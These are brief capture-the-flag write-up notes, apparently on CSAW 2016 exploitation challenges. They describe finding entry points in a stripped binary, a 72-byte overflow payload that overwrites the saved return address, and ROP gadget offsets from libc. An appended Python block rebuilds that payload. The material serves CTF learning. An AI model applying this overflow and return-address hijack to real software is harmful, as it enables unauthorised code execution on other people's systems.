- First, this program is stripped, so we have to find the entry point (EP) with readelf. The EP of the main function is 0x40061d
- Payload: [buffer]*64 + rbp + ret
- To bypass ASLR we have to know the start address of the easy function, and it is provided
- The actual payload looks like this: `'a'*72+'\x0d\x06\x40\x00'+'\x00'*4`
- Its python code is here
- For this program we also need to find the EP; the EP of the main function is 0x401087
- To run this program locally, you have to create a user named tutorial and run the program with admin (root) permissions
- The binary file is only used with gdb; libc is used to find ROP gadgets and the offsets between functions
- If you are Korean, see this [site](http://s0ngsari.tistory.com/entry/CSAW-2016-tutorial) for more information (not mine)
- My python code is [here](https://github.com/parksjin01/ctf/blob/master/2016/CSAW/tutorial.py)
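As an added illustration of the first challenge's payload layout above (`[buffer]*64 + rbp + ret`), the following is not the writeup author's code: it builds the same bytes from the stated sizes and the return address used in the payload (0x40060d), and splits them back into the three stack regions so the overwrite of the saved rbp and return address is visible. The region sizes are taken from the notes; the split-up helper is mine.

```python
import struct

# Stack layout from the notes: 64-byte buffer, then the 8-byte saved rbp,
# then the saved return address (x86-64 frame layout).
BUFFER_SIZE = 64
SAVED_RBP_SIZE = 8
RETURN_TARGET = 0x40060d  # address the notes' payload returns to


def p64(value):
    """Pack an integer as 8 little-endian bytes, as an x86-64 pointer is stored."""
    return struct.pack('<Q', value)


def return_address_offset(buffer_size, saved_rbp_size=SAVED_RBP_SIZE):
    """Bytes from the start of the buffer to the saved return address."""
    return buffer_size + saved_rbp_size


def build_payload(buffer_size, ret_addr, filler=b'a'):
    """Filler covering the buffer and saved rbp, followed by the packed return address."""
    return filler * return_address_offset(buffer_size) + p64(ret_addr)


def describe(payload, buffer_size):
    """Split a payload into buffer, saved-rbp and return-address regions (added helper)."""
    off = return_address_offset(buffer_size)
    return {
        'buffer': payload[:buffer_size],
        'saved_rbp': payload[buffer_size:off],
        'ret_addr': struct.unpack('<Q', payload[off:off + 8])[0],
    }


if __name__ == '__main__':
    payload = build_payload(BUFFER_SIZE, RETURN_TARGET)
    # Same bytes as the hand-written payload in the notes: 72 filler bytes + 0x40060d little-endian.
    assert payload == b'a' * 72 + b'\x0d\x06\x40\x00' + b'\x00' * 4
    for region, value in describe(payload, BUFFER_SIZE).items():
        print(region, hex(value) if isinstance(value, int) else len(value))
```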